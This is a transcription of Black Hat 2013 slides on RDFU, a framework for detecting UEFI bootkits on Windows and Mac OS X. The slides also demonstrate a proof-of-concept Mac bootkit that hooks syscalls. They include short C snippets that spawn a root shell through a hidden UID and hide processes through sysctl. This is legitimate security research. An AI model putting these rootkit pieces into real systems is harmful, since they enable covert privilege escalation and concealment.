PRESS ROOT TO CONTINUE: DETECTING OSX AND WINDOWS BOOTKITS WITH RDFU
|
|
- Prosper Williams
- 6 years ago
- Views:
Transcription
1 Mario Vuksan & Tomislav PericinBlackHat USA 2013, Las Vegas PRESS ROOT TO CONTINUE: DETECTING OSX AND WINDOWS BOOTKITS WITH RDFU
2 Agenda Our motivation Who are we Introduction to Unified extensible framework interface (UEFI) Previous UEFI bootkit research Rootkit detection framework RDFU Framework design VMWare implementation demo MacOSX bootkitdemo
3 Our motivation UEFI is very popular Windows + Android + MacOS+ Full-stack: UEFI is a mini-os Memory and file manipulation, full network stack Graphics APIs, device management Remote boot Attacker s paradise No tools for analysis, low visibility, even no AV, Some good news though UEFI SecureBoot(Surface RT, Android)
4 Who are we ReversingLabs Founded by Mario Vuksan and Tomislav Pericinin 2009 Focusing on Deep binary analysis of PE/ELF/Mach-O/DEX and firmware System reputation and anomaly detections Black Hat presentations and open source projects TitanEngine: PE reconstruction library (2009) NyxEngine: Archive format stego detection tool (2010) TitanMist: Unpacking (2010) Unofficial guide to PE malformations (2011) FDF: disinfection framework (2012) RDFU: UEFI rootkit detection framework (2013)
5 Thanks John Heasman, Black Hat 2007 Snare, Assurance, Black Hat 2012 Dan Griffin, Defcon 2012 Sebastien Kaczmarek, HITB Amsterdam 2013 DARPA CFT
6 UEFI unified extensible firmware interface
7 Booting with BIOS BIOS MBR REAL MODE (16 bit) NTLDR NTOSKRNL.EXE KERNEL HAL SMS USERLAND WIN32 Distribution Statement A (Approved for Public Release, Distribution Unlimited)
8 UEFI? UEFI: Unified extensible firmware interface Originally developed by Intel, Intel boot initiative Community effort to modernize PC booting process Currently ships as a boot option alongside legacy BIOS Aims to be the only booting interface in the future Used in all Intel Macs and other PC motherboards Managed by Unified Extensible Firmware Interface (UEFI) Forum
9 Booting with EFI UEFI UEFI bootloader \EFI\Microsoft\Boot\bootmgfw.efi PROTECTED MODE winload.efi NTOSKRNL.EXE KERNEL HAL SMS USERLAND WIN32 Distribution Statement A (Approved for Public Release, Distribution Unlimited)
10 UEFI Conceptual overview Operating system EFI Operating system loader Other interfaces (ACPI, SMBIOS ) EFI Boot services Platform hardware EFI runtime services EFI partition
11 EFI boot sequence EFI Driver EFI Application EFI Boot code OS Loader Platform init EFI image load EFI OS loader load Boot service terminates Standard firmware initialization Drivers and applications loaded Boot from ordered EFIOS list Operations handed off to OS Boot Manager EFI images
12 UEFI images UEFI images: Typically PE32/PE32+ (basic format feature subset) Standard also predicts that other formats can be defined by anyone implementing the specification, e.g. TE defined by Intel and used by Apple
13 UEFI images UEFI drivers: Boot service driver Terminated once ExitBootServices() is called Runtime service driver UEFI applications: EFI application Normal EFI applications must execute in pre-boot environment OS loader application Special UEFI application that can take control of the system by calling ExitBootServices()
14 UEFI Boot services UEFI boot services: Consists of functions that are available before ExitBootServices() is called These functions can be categorized as global, handle based and dynamically created protocols Global System services available on all platforms Event, Timer and Task Priority services Memory allocation services Protocol handler services Image services Miscellaneous services Handle based Specific functionally not available everywhere
15 UEFI Runtime services UEFI runtime services: Consists of functions that are available before and after ExitBootServices() is called These functions can be categorized as global, handle based and dynamically created protocols Global System services available on all platforms Runtime rules and restrictions Variable services Time services Virtual memory services Miscellaneous services Handle based Specific functionally not available everywhere
16 EDK2 EFI development kit TianoCore Intel s reference implementation Enables writing EFI applications and drivers in C Has its own stdlibcimplementation that covers a part of the standard library Has a set of packages for shell, crypto, emulation and more Has a set of applications built with stdlibc implementation For example: Python 2.7 Has a build system which uses popular compilers (VS, GCC and XCode) Supported CPUs: IA64, x86-64 and ARM
17 EDK2 HelloWorld.c /*** Print a welcoming message. Establishes the main structure of the 0 The application exited Other An error occurred. ***/ INTN EFIAPI ShellAppMain( IN UINTN Argc, IN CHAR16 **Argv ) { Print(L"Hellothere fellow Programmer.\n"); Print(L"Welcome to the world of EDK II.\n"); return(0); }
18 UEFI - HelloWorld.c /*** Print a welcoming message. Establishes the main structure of the 0 The application exited Other An error occurred. ***/ INTN EFIAPI UEFIAppMain( IN EFI_HANDLE ImageHandle, IN EFI_SYSTEM_TABLE *SystemTable/** Boot and Runtime services **/ ) { Print(L"Hellothere fellow Programmer.\n"); return(0); }
19 Bootkits attacking unified extensible firmware interface
20 Previous work 07 Hacking extensible firmware interface John Heasman, NGS Consulting Presented at BlackHat 2007, USA Research Modifying NVRAM variables Code injection attacks Shimming boot services Abusing system management mode
21 Previous work 12 Hacking extensible firmware interface Snare, Assurance Presented at BlackHat 2012, USA Research Patching MacOS X kernel Evil maid attack
22 Previous work 13 Dreamboot Windows 8 x64 bootkit Sébastien Kaczmarek, QuarksLab Presented at HackInTheBox 2013, Amsterdam Modus operandi Bypasses kernel protections (NX and Patch guard) Bypasses local authentication Elevates process privileges
23 Dreamboot UEFI UEFI bootloader \EFI\Microsoft\Boot\bootmgfw.efi winload.efi NTOSKRNL.EXE HAL HOOK! HOOK! HOOK! KERNEL CALLBACK SMS USERLAND WIN32 Distribution Statement A (Approved for Public Release, Distribution Unlimited) CALLBACK
24 RDFU rootkit detection framework for uefi
25 What is RDFU? Set of EFI applications and drivers that enable: Listing all EFI drivers loaded into memory Probing entire memory range, scanning for executable Monitoring newly loaded drivers until operating system starts Listing and scanning EFI BOOT SERVICES and EFI RUNTIME SERVICES for modified function pointers Continually monitoring EFI BOOT SERVICES and EFI RUNTIME SERVICES while operating system is being loaded Displaying memory map and dumping all suitable regions Listing and monitoring EVENT callbacks that can be used by rootkits/malware Working in a standalone mode without the EFI shell
26 What does RDFU support? Supported UEFI implementations: UEFI 2.x specification for 32-bit and 64-bit Implementations UEFI 1.x specification MacOS UEFI implementation VirtualBox VMWare Not supported UEFI implementations: UEFI ARM implementation (only on Surface RT, has secure boot enabled)
27 How does RDFU work? DXE driver loaded via UEFI shell DXE driver loaded from USB thumb drive Scanner application run from UEFI shell Logging and dumping is done to the mounted hard drive or the USB thumb drive
28 VMWARE
29 VMWARE
30 VMWARE
31 VMWARE
32 VMWARE
33 DEMO rootkit detection framework for uefi
34 MAC OS 10.7.x bootkit first MacOS X bootkit example
35 Bootkit goals Create hidden folders Hiding (with un-hiding) processes Execute shell with root privileges Retrieve FileVault password
36 Running the MacOS bootkit Mac OS X 10.7.x -Lion
37 Running the MacOS bootkit Boot the OS from an USB thumb drive
38 VMWare / MacOS bootkit MacOScan also be run in VMWare if you don t have a MacBook Pro handy Running MacOSunder VMWare requires an unofficial patch wink wink nudge nudge Once patched we need to change the VMX file firmware = "efi" After that MacOScan be installed with EFI 1.10
39 Bootkit workflow UEFI EFI\boot\bootx64.efi BS->CreateEvent EVT_SIGNAL_VIRTUAL_ADDRESS_CHANGE SystemTable->ConIn->ReadKeyStroke BS->OpenProtocol LoadedImage->Unload Register event callback HOOK! Fail safe Load Mac OS X
40 Bootkit workflow Load Mac OS X Enumerate drives \System\Library\CoreServices\boot.efi User choice on multiple OS X instances found BS->LoadImage BS->StartImage
41 Bootkit workflow SIGNAL EVT_SIGNAL_VIRTUAL_ADDRESS_CHANGE EVENT SetVirtualAddressMap() Locate syscall table Hook syscalls: setuid, getdirentries, getdirentriesattr& sysctl HOOK!
42 Getting ROOT /*** executes shell with root rights ***/ #define HIDDEN_UID 1911 intmain( void ) { setuid(hidden_uid); system("/bin/sh"); }
43 Hiding processes /*** sends the pidto the rootkit that should be hidden ***/ int main(int argc, char *argv[]) { pid_tpid= atoi(argv[1]); printf("adding pid%d (%08x) hide list\n", pid, pid); int name[] = { CTL_ADD_PID, pid, KERN_PROC_ALL, 0 }; err = sysctl((int*)name, (sizeof(name) / sizeof(*name)) -1, NULL, &length, NULL, 0); } printf("all done, sysctl returned 0x%08x\n", err); return EXIT_SUCCESS;
44 DEMO MacOS X bootkit
45 QA Thanks!
Hacking the Extensible Firmware Interface. John Heasman, Director of Research
Hacking the Extensible Firmware Interface John Heasman, Director of Research Agenda The role of the BIOS Attacking a legacy BIOS Limitations of the legacy BIOS Introduction to the EFI environment Attacking
More informationIA32 OS START-UP UEFI FIRMWARE. CS124 Operating Systems Fall , Lecture 6
IA32 OS START-UP UEFI FIRMWARE CS124 Operating Systems Fall 2017-2018, Lecture 6 2 Last Time: IA32 Bootstrap Computers and operating systems employ a bootstrap process to load and start the operating system
More informationUEFI and PCI bootkits. Pierre Chifflier PacSec 2013
UEFI and PCI bootkits Pierre Chifflier PacSec 2013 ANSSI Created on July 7th 2009, the ANSSI (French Network and Information Security Agency) is the national authority for the defense and the security
More informationStrengthening the Chain of Trust. Kevin Lane HP Jeff Bobzin Insyde Software
presented by Strengthening the Chain of Trust Kevin Lane HP Jeff Bobzin Insyde Software August Updated 22, 2014 2011-06-01 Agenda Quick Intro to UEFI UEFI Myths Using Linux + Secure Boot Continuing the
More informationPL-I Assignment Broup B-Ass 5 BIOS & UEFI
PL-I Assignment Broup B-Ass 5 BIOS & UEFI Vocabulary BIOS = Basic Input Output System UEFI = Unified Extensible Firmware Interface POST= Power On Self Test BR = Boot Record (aka MBR) BC =Boot Code (aka
More informationUsing the UEFI Shell. October 2010 UEFI Taipei Plugfest Insyde Software
Using the UEFI Shell October 2010 UEFI Taipei Plugfest 1 San Francisco Cable Car 2 Agenda Insyde UEFI Support UEFI Shell 2.0 What is it? UEFI Shell 2.0 Unique Features Network Browsing Example Application
More informationRomain Thomas - Static instrumentation based on executable file formats
Romain Thomas - rthomas@quarkslab.com Static instrumentation based on executable file formats About Romain Thomas - Security engineer at Quarkslab Working on various topics: Android, (de)obfuscation, software
More informationImpact of platform firmware on Linux kernel. Megha Dey, Sai Praneeth Prakhya Intel Open Source Technology Center
Impact of platform firmware on Linux kernel Megha Dey, Sai Praneeth Prakhya Intel Open Source Technology Center AGENDA Introduction to UEFI UEFI implementation bug crashing Linux Linux EFI subsystem bug
More informationAdvanced x86: BIOS and System Management Mode Internals UEFI SecureBoot. Xeno Kovah && Corey Kallenberg LegbaCore, LLC
Advanced x86: BIOS and System Management Mode Internals UEFI SecureBoot Xeno Kovah && Corey Kallenberg LegbaCore, LLC All materials are licensed under a Creative Commons Share Alike license. http://creativecommons.org/licenses/by-sa/3.0/
More informationAttacking and Defending the Platform
presented by Attacking and Defending the Platform Spring 2018 UEFI Seminar and Plugfest March 26-30, 2018 Presented by Erik Bjorge and Maggie Jauregui (Intel) Legal Notice No computer system can be absolutely
More informationDebugging under Unified Extensible Firmware Interface (UEFI): Addressing DXE Driver Challenges
Debugging under Unified Extensible Firmware Interface (UEFI): Addressing DXE Driver Challenges Jeff Bobzin Sr. Director Insyde Software Session ID EFIS003 Debugging Then The first computer bug, a moth
More informationPrivilege Escalation
Privilege Coleman Kane Coleman.Kane@ge.com February 9, 2015 Security Vulnerability Assessment Privilege 1 / 14 root, or Privilege or Elevation is the act of gaining access to resources which were intended
More informationGeneral Firmware Overview of Recommendations for Window OS
presented by General Firmware Overview of Recommendations for Window OS Spring 2017 UEFI Seminar and Plugfest March 27-31, 2017 Presented by Fei Zhou (Microsoft, Inc.) Updated 2011-06- 01 UEFI Plugfest
More informationO p t i m i z e d U E F I I m p l e m e n t a t i o n o n I n t e l X e o n B a s e d O C P P l a t f o r m
O p t i m i z e d U E F I I m p l e m e n t a t i o n o n I n t e l X e o n B a s e d O C P P l a t f o r m Sarathy Jayakumar, Principal Engineer, Intel Corp Mohan J. Kumar, Fellow, Intel Corp B a s e
More informationPast, Present, and Future Justin Johnson Senior Principal Firmware Engineer
Dell Firmware Security Past, Present, and Future Justin Johnson Senior Principal Firmware Engineer justin.johnson1@dell.com Dell Security 2 What does BIOS do? Configure and Test System Memory Configure
More informationIntel Boot Loader Development Kit (Intel BLDK)
Intel Boot Loader Development Kit (Intel BLDK) Version 2.0 UEFI Standard Based User Guide INFORMATION IN THIS DOCUMENT IS PROVIDED IN CONNECTION WITH BYOSOFT PRODUCTS. NO LICENSE, EXPRESS OR IMPLIED, BY
More informationSystem Firmware and Device Firmware Updates using Unified Extensible Firmware Interface (UEFI) Capsules
presented by System Firmware and Device Firmware Updates using Unified Extensible Firmware Interface (UEFI) Capsules Fall 2018 UEFI Plugfest October 15 19, 2018 Presented by Brian Richardson (Intel) Materials
More informationSpectre, Meltdown, and the Impact of Security Vulnerabilities on your IT Environment. Orin Jeff Melnick
Spectre, Meltdown, and the Impact of Security Vulnerabilities on your IT Environment Orin Thomas @orinthomas Jeff Melnick Jeff.Melnick@Netwrix.com In this session Vulnerability types Spectre Meltdown Spectre
More informationManufacturing Tools in the UEFI Secure Boot Environment
Manufacturing Tools in the UEFI Secure Boot Environment Presented by Stefano Righi presented by UEFI Plugfest May 2014 Agenda Introduction Transition of Manufacturing Tools to UEFI Manufacturing Tools
More informationAn Introduction to Platform Security
presented by An Introduction to Platform Security Spring 2018 UEFI Seminar and Plugfest March 26-30, 2018 Presented by Brent Holtsclaw and John Loucaides (Intel) Legal Notice No computer system can be
More informationDE MYSTERIIS DOM JOBSIVS: MAC EFI ROOTKITS
DE MYSTERIIS DOM JOBSIVS: MAC EFI ROOTKITS SNARE @ SYSCAN SINGAPORE APRIL 2012 assurance AGENDA Things I will talk about I. Introduction - goals, concepts & prior work II. EFI fundamentals III. Doing bad
More informationARM Server s Firmware Security
presented by ARM Server s Firmware Security Spring 2017 UEFI Seminar and Plugfest March 27-31, 2017 Presented by Zhixiong (Jonathan) Zhang (Cavium, Inc.) Updated 2011-06- 01 UEFI Plugfest March 2017 www.uefi.org
More informationSubverting the Linux Kernel Linux Kernel Rootkits 101
Subverting the Linux Kernel Linux Kernel Rootkits 101 Kernel Rootkits? A collection of program(s) that hide an attacker's presence and activities on a compromised system Typically allows an attacker to
More informationChapter 2: Operating-System Structures. Operating System Concepts 9 th Edit9on
Chapter 2: Operating-System Structures Operating System Concepts 9 th Edit9on Silberschatz, Galvin and Gagne 2013 Chapter 2: Operating-System Structures 1. Operating System Services 2. User Operating System
More informationImpact of platform firmware on Linux kernel. Megha Dey, Sai Praneeth Prakhya Intel Open Source Technology Center
Impact of platform firmware on Linux kernel Megha Dey, Sai Praneeth Prakhya Intel Open Source Technology Center AGENDA Introduction to UEFI UEFI implementation bug crashing Linux Linux EFI subsystem bug
More informationTailoring TrustZone as SMM Equivalent
presented by Tailoring TrustZone as SMM Equivalent Tony C.S. Lo Senior Manager American Megatrends Inc. UEFI Plugfest March 2016 www.uefi.org 1 Agenda Introduction ARM TrustZone SMM-Like Services in TrustZone
More informationUEFI What is it? Spring 2017 UEFI Seminar and Plugfest March 27-31, 2017 Presented by Dong Wei (ARM) presented by. Updated
presented by UEFI What is it? Spring 2017 UEFI Seminar and Plugfest March 27-31, 2017 Presented by Dong Wei (ARM) Updated 2011-06- 01 UEFI Plugfest March 2017 www.uefi.org 1 Agenda Introduction Background
More informationHow To Repair Win 7's Boot Loader After You Install Xp
How To Repair Win 7's Boot Loader After You Install Xp Here we're installing XP Professional on the new partition. This is due to XP writing it's bootloader over Windows 7's. After getting the bootloader
More informationGraphics Output Protocol (GOP) Driver for UEFI
Graphics Output Protocol (GOP) Driver for UEFI Reethambari S V 1, Dr D Seshachalam 2 1 Department of ECE BMS College of Engineering,Bangalore, India. 2 Professor and former HOD, Dept of ECEBMS College
More informationUEFI Test Tools For Linux Developers
presented by UEFI Test Tools For Linux Developers Brian Richardson Intel Corporation Alex Hung Canonical, Ltd. August Updated 22, 2014 2011-06-01 Agenda UEFI & Linux Interoperability Using FWTS with UEFI
More informationFirmware Rootkits: The Threat to the Enterprise. John Heasman, Director of Research
Firmware Rootkits: The Threat to the Enterprise John Heasman, Director of Research Agenda Recap of ACPI BIOS rootkit and limitations Brief overview of the PCI Bus Abusing expansion ROMs Abusing PXE Detection,
More informationIntel s Virtualization Extensions (VT-x) So you want to build a hypervisor?
Intel s Virtualization Extensions (VT-x) So you want to build a hypervisor? Mr. Jacob Torrey May 13, 2014 Dartmouth College 153 Brooks Road, Rome, NY 315.336.3306 http://ainfosec.com @JacobTorrey torreyj@ainfosec.com
More informationOperating Systems 2010/2011
Operating Systems 2010/2011 Introduction Johan Lukkien 1 Agenda OS: place in the system Some common notions Motivation & OS tasks Extra-functional requirements Course overview Read chapters 1 + 2 2 A computer
More informationChapter 2: Operating-System Structures
Chapter 2: Operating-System Structures Chapter 2: Operating-System Structures Operating System Services User Operating System Interface System Calls Types of System Calls System Programs Operating System
More informationCS 300 Leftovers. CS460 Pacific University 1
CS 300 Leftovers Pacific University 1 argc/argv The C Programming Language section 5.10, page 114 int main(int argc, char** argv) argc - number of entries in argv argv - array of character pointers containing
More informationChapter 2. Operating-System Structures
Chapter 2 Operating-System Structures 2.1 Chapter 2: Operating-System Structures Operating System Services User Operating System Interface System Calls Types of System Calls System Programs Operating System
More informationManual Format Flash Drive Mac Os X Lion Startup
Manual Format Flash Drive Mac Os X Lion Startup Learn more about Boot Camp and its features for OS X Lion and Mountain Lion. on Mac computers that do not have an optical drive, with a USB flash drive that
More informationUEFI Porting Update for ARM Platforms
UEFI Porting Update for ARM Platforms What did we do since July? Leif Lindholm UEFI tech lead Linaro Enterprise Group presented by UEFI Plugfest May 2014 Agenda Introduction Linux Support EDK2 Development
More informationArsenal. Shadow-Box: Lightweight Hypervisor-Based Kernel Protector. Seunghun Han, Jungwhan Kang (hanseunghun
Arsenal Shadow-Box: Lightweight Hypervisor-Based Kernel Protector Seunghun Han, Jungwhan Kang (hanseunghun ultract)@nsr.re.kr Who are we? - Senior security researcher at NSR (National Security Research
More informationAdvanced Operating Systems and Virtualization. Alessandro Pellegrini A.Y. 2017/2018
Advanced Operating Systems and Virtualization Alessandro Pellegrini A.Y. 2017/2018 Basic Information Lecture Schedule: Course begins today! Course ends on June 1 st Lecture slots: Tuesday, 08.00 am 10.00
More informationOperating Systems 4/27/2015
Virtualization inside the OS Operating Systems 24. Virtualization Memory virtualization Process feels like it has its own address space Created by MMU, configured by OS Storage virtualization Logical view
More informationEngineering UEFI Firmware for Windows: Best Practices and Pitfalls to Avoid
presented by Engineering UEFI Firmware for Windows: Best Practices and Pitfalls to Avoid UEFI Summerfest July 15-19, 2013 Presented by Emily Wilson (Microsoft Corp.) Updated 2011-06-01 UEFI Summerfest
More informationChapter 2: Operating-System Structures. Operating System Concepts 9 th Edition
Chapter 2: Operating-System Structures Silberschatz, Galvin and Gagne 2013 Chapter 2: Operating-System Structures Operating System Services User Operating System Interface System Calls Types of System
More informationCreate Mac Os X Lion Install Usb On Windows 7 Dual Boots
Create Mac Os X Lion Install Usb On Windows 7 Dual Boots Apple's latest update to Mac OS X, 10.11 El Capitan, will be available to the to use El Capitan on your only computer, it's wise to install it as
More informationCreate Windows 7 Usb Install Mac Os X 10.7 Lion
Create Windows 7 Usb Install Mac Os X 10.7 Lion Theme instalar mac os x lion en windows 7 virtualbox, install mac os x mountain lion how to make mac os x mountain lion install dvd, bootable usb key mac
More informationLonghorn Large Sector Size Support. Anuraag Tiwari Program Manager Core File System
Longhorn Large Sector Size Support Anuraag Tiwari Program Manager Core File System anuraagt@microsoft.com Agenda Historical OS Support for Large Sector Size Drives A Brief Overview of the OS Disk I/O Components
More informationManual Mac Os X 10.7 Iso Vmware Image For
Manual Mac Os X 10.7 Iso Vmware Image For Windows Pc Mac OS X is an advanced operating system, easy to use and extremely stable when install mac on windows 7, install osx on pc, VMWare Workstation mac
More informationBackup, File Backup copies of individual files made in order to replace the original file(s) in case it is damaged or lost.
Glossary A Active Directory a directory service that inventories, secures and manages the users, computers, rules and other components of a Microsoft Windows network. This service is typically deployed
More informationWriting and Debugging EBC Drivers
Writing and Debugging EBC Drivers Michael Kinney Principal Engineer Intel February 27 th 2007 Copyright 2007 Intel Corporation Disclaimer THIS INFORMATION COTNAINED IN THIS DOCUMENT, INCLUDING ANY TEST
More informationUEFI Secure Boot and DRI. Kalyan Kumar N
UEFI Secure Boot and DRI Kalyan Kumar N Agenda Introduction RDK Boot Loader DRI (Disaster Recovery Image) RootFS Validation Build Environment Introduction Standardization of the RDK set-top box firmware
More informationOperating Systems. II. Processes
Operating Systems II. Processes Ludovic Apvrille ludovic.apvrille@telecom-paristech.fr Eurecom, office 470 http://soc.eurecom.fr/os/ @OS Eurecom Outline Concepts Definitions and basic concepts Process
More informationWhat are some common categories of system calls? What are common ways of structuring an OS? What are the principles behind OS design and
What are the services provided by an OS? What are system calls? What are some common categories of system calls? What are the principles behind OS design and implementation? What are common ways of structuring
More informationCHAPTER 2: SYSTEM STRUCTURES. By I-Chen Lin Textbook: Operating System Concepts 9th Ed.
CHAPTER 2: SYSTEM STRUCTURES By I-Chen Lin Textbook: Operating System Concepts 9th Ed. Chapter 2: System Structures Operating System Services User Operating System Interface System Calls Types of System
More informationARM Trusted Firmware ARM UEFI SCT update
presented by ARM Trusted Firmware ARM UEFI SCT update UEFI US Fall Plugfest September 20-22, 2016 Presented by Charles García-Tobin (ARM) Updated 2011-06-01 Agenda ARM Trusted Firmware What and why UEFI
More informationWindows 8 Uefi Bios Update Step By Step Guide Msi Usa
We have made it easy for you to find a PDF Ebooks without any digging. And by having access to our ebooks online or by storing it on your computer, you have convenient answers with windows 8 uefi bios
More informationUEFI Support for Memtest86+ Patricio Chilano Mateo
UEFI Support for Memtest86+ Patricio Chilano Mateo 1 MEMTEST86+ http://www.memtest.org/ Memory diagnostic tool for x86 and x86-64 platforms Release History - Initial release on 2004 as a fork of Memtest86
More informationA Tour Beyond BIOS Implementing Profiling in with EDK II
White Paper A Tour Beyond BIOS Implementing Profiling in with EDK II Jiewen Yao, Intel Corporation Vincent J. Zimmer, Intel Corporation Star Zeng, Intel Corporation Fan Jeff, Intel Corporation July 2016
More informationOperating System Services. User Services. System Operation Services. User Operating System Interface - CLI. A View of Operating System Services
Operating System Services One set of services for users The other set of services for system operations Operating Systems Structures Notice: This set of slides is based on the notes by Professor Perrone
More informationComparison on BIOS between UEFI and Legacy
Comparison on BIOS between UEFI and Legacy Abstract The BIOS (Basic Input/Output System) connects the hardware with the system software. The system BIOS is between the system hardware and the system software,
More informationECE 471 Embedded Systems Lecture 12
ECE 471 Embedded Systems Lecture 12 Vince Weaver http://www.eece.maine.edu/~vweaver vincent.weaver@maine.edu 8 October 2015 Announcements Homework grades have been sent out, let me know if you did not
More informationCIS 4360 Secure Computer Systems Secured System Boot
CIS 4360 Secure Computer Systems Secured System Boot Professor Qiang Zeng Spring 2017 Previous Class Attacks against System Boot Bootkit Evil Maid Attack Bios-kit Attacks against RAM DMA Attack Cold Boot
More informationOperating Systems (2INC0) 2018/19. Introduction (01) Dr. Tanir Ozcelebi. Courtesy of Prof. Dr. Johan Lukkien. System Architecture and Networking Group
Operating Systems (2INC0) 20/19 Introduction (01) Dr. Courtesy of Prof. Dr. Johan Lukkien System Architecture and Networking Group Course Overview Introduction to operating systems Processes, threads and
More informationOperating system hardening
Operating system Comp Sci 3600 Security Outline 1 2 3 4 5 6 What is OS? Hardening process that includes planning, ation, uration, update, and maintenance of the operating system and the key applications
More informationOperating Systems. Operating System Structure. Lecture 2 Michael O Boyle
Operating Systems Operating System Structure Lecture 2 Michael O Boyle 1 Overview Architecture impact User operating interaction User vs kernel Syscall Operating System structure Layers Examples 2 Lower-level
More informationFour Components of a Computer System
Four Components of a Computer System Operating System Concepts Essentials 2nd Edition 1.1 Silberschatz, Galvin and Gagne 2013 Operating System Definition OS is a resource allocator Manages all resources
More informationThe Challenges of X86 Hardware Virtualization. GCC- Virtualization: Rajeev Wankar 36
The Challenges of X86 Hardware Virtualization GCC- Virtualization: Rajeev Wankar 36 The Challenges of X86 Hardware Virtualization X86 operating systems are designed to run directly on the bare-metal hardware,
More informationCS 290 Host-based Security and Malware. Christopher Kruegel
CS 290 Host-based Security and Malware Christopher Kruegel chris@cs.ucsb.edu Windows Windows > 90 % of all computers run Windows when dealing with security issues, it is important to have (some) knowledge
More informationHow to boot Mac OS X 10.5 from RocketRAID esata for Mac
How to boot Mac OS X 10.5 from RocketRAID esata for Mac Step 1: Prepare 3 files 1) Carbon Copy Cloner 2) EFI BIOS 3) Driver for Mac OS X 10.5 Step 2: Install Mac OS X 10.5 Install Mac OS X onto the hard
More informationOS lpr. www. nfsd gcc emacs ls 1/27/09. Process Management. CS 537 Lecture 3: Processes. Example OS in operation. Why Processes? Simplicity + Speed
Process Management CS 537 Lecture 3: Processes Michael Swift This lecture begins a series of topics on processes, threads, and synchronization Today: processes and process management what are the OS units
More informationA Tour Beyond BIOS Using the Intel Firmware Support Package with the EFI Developer Kit II
White Paper A Tour Beyond BIOS Using the Intel Firmware Support Package with the EFI Developer Kit II Jiewen Yao Intel Corporation Vincent J. Zimmer Intel Corporation Ravi Rangarajan Intel Corporation
More informationRemote Desktop Connection
How To Configure Grub In Windows 7 For Remote Desktop Connection Dual-boot: Set Windows 8 as default boot loader option in Grub help you to change the default boot option from Ubuntu to Windows 8 (or 7
More informationSolutions for the Intel Platform Innovation Framework for EFI July 26, Slide 1
Solutions for the Intel Platform Innovation Framework for EFI July 26, 2005 Slide 1 AMI introduces Aptio AMI s Framework-based product offering Offers all innovations of the Intel Platform Innovation Framework
More informationIT ESSENTIALS V. 4.1 Module 5 Fundamental Operating Systems
IT ESSENTIALS V. 4.1 Module 5 Fundamental Operating Systems 5.0 Introduction 1. What controls almost all functions on a computer? The operating system 5.1 Explain the purpose of an operating system 2.
More informationUEFI updates, Secure firmware and Secure Services on Arm
presented by UEFI updates, Secure firmware and Secure Services on Arm Spring 2018 UEFI Seminar and Plugfest March 26-30, 2018 Presented by Dong Wei & Matteo Carlini (Arm) Agenda UEFI and SBBR/EBBR Updates
More informationAbout the Presentations
About the Presentations The presentations cover the objectives found in the opening of each chapter. All chapter objectives are listed in the beginning of each presentation. You may customize the presentations
More informationWindows 7 Will Not Load On My Computer Support Hardware Virtualization
Windows 7 Will Not Load On My Computer Support Hardware Virtualization Jun 12, 2015. Windows 7 Help Forums Windows 7 help and support Virtualization» for it. so i booted up my pc and looked if i support
More informationComputer Labs The Minix 3 Operating System
Computer Labs The Minix 3 Operating System 2 o MIEIC Pedro F. Souto (pfs@fe.up.pt) September 17, 2015 LCOM Labs One of the goals of LCOM is that you learn to use the HW-level interface of the most common
More informationUEFI and IoT: Best Practices in Developing IoT Firmware Solutions
presented by UEFI and IoT: Best Practices in Developing IoT Firmware Solutions Spring 2017 UEFI Seminar and Plugfest March 27-31, 2017 Presented by Hawk Chen (Byosoft) Updated 2011-06- 01 UEFI Plugfest
More informationIntroduction to Intel Boot Loader Development Kit (Intel BLDK) Intel SSG/SSD/UEFI
Introduction to Intel Boot Loader Development Kit (Intel BLDK) Intel SSG/SSD/UEFI Legal Disclaimer INFORMATION IN THIS DOCUMENT IS PROVIDED IN CONNECTION WITH INTEL PRODUCTS. NO LICENSE, EXPRESS OR IMPLIED,
More informationMalware
reloaded Malware Research Team @ @xabiugarte Motivation Design principles / architecture Features Use cases Future work Dynamic Binary Instrumentation Techniques to trace the execution of a binary (or
More informationUsb Port On Manually Disable Win7 7 Registry
Usb Port On Manually Disable Win7 7 Registry USB ports You may need to disable the USB ports on a computer to prevent anyone from are running Windows XP, Vista, 7, or 8 follow the steps below to disable
More informationAbout unchecked management SMM & UEFI. Vulnerability. Patch. Conclusion. Bruno Pujos. July 16, Bruno Pujos
July 16, 2016 1/45 Whoami RE, vulnerability research LSE 2015 Sogeti since 2/45 1 2 Reverse Exploitation 3 4 3/45 Agenda 1 4/45 Agenda 1 5/45 Unified Extended FIrmware is based on EFI Specification for
More informationEmbedded lightweight unix
Embedded lightweight unix ELWIX its free now! Universal embedded system http://www.elwix.org/ Michael Pounov Since 2004 like propriatary OS Give best practices and features from *BSD
More informationThe Role UEFI Technologies Play in ARM Platform Architecture
presented by The Role UEFI Technologies Play in ARM Platform Architecture Spring 2017 UEFI Seminar and Plugfest March 27-31, 2017 Presented by Dong Wei (ARM) Updated 2011-06- 01 UEFI Plugfest March 2017
More informationProtection. Thierry Sans
Protection Thierry Sans Protecting Programs How to lower the risk of a program security flaw resulting from a bug? 1. Build better programs 2. Build better operating systems Build Better Programs Why are
More information9L0-412 Q&As. OS X Support Essentials 10.8 Exam. Pass Apple 9L0-412 Exam with 100% Guarantee
9L0-412 Q&As OS X Support Essentials 10.8 Exam Pass Apple 9L0-412 Exam with 100% Guarantee Free Download Real Questions & Answers PDF and VCE file from: 100% Passing Guarantee 100% Money Back Assurance
More informationGELI Support for UEFI
GELI Support for UEFI Eric L. McCorkle September 9, 2017 Disclaimer The content of this presentation does not constitute a statement on behalf of or represent the position of any company or organization.
More informationDo as I Say not as I Do Stealth Modification of Programmable Logic Controllers I/O by Pin Control Attack
Do as I Say not as I Do Stealth Modification of Programmable Logic Controllers I/O by Pin Control Attack ALI ABBASI SYSSEC GROUP, RUHR UNIVERSITY BOCHUM, GERMANY & SCS GROUP UNIVERSITY OF TWENTE, NETHERLANDS
More information518 Lecture Notes Week 3
518 Lecture Notes Week 3 (Sept. 15, 2014) 1/8 518 Lecture Notes Week 3 1 Topics Process management Process creation with fork() Overlaying an existing process with exec Notes on Lab 3 2 Process management
More informationECE 550D Fundamentals of Computer Systems and Engineering. Fall 2017
ECE 550D Fundamentals of Computer Systems and Engineering Fall 2017 The Operating System (OS) Prof. John Board Duke University Slides are derived from work by Profs. Tyler Bletsch and Andrew Hilton (Duke)
More informationUEFI Development Anti- Patterns
presented by UEFI Development Anti- Patterns Spring 2017 UEFI Seminar and Plugfest March 27-31, 2017 Presented by Chris Stewart (HP Inc.) Lead Security Developer, Firmware Updated 2011-06- 01 UEFI Plugfest
More informationThe Slide does not contain all the information and cannot be treated as a study material for Operating System. Please refer the text book for exams.
The Slide does not contain all the information and cannot be treated as a study material for Operating System. Please refer the text book for exams. Operating System Services User Operating System Interface
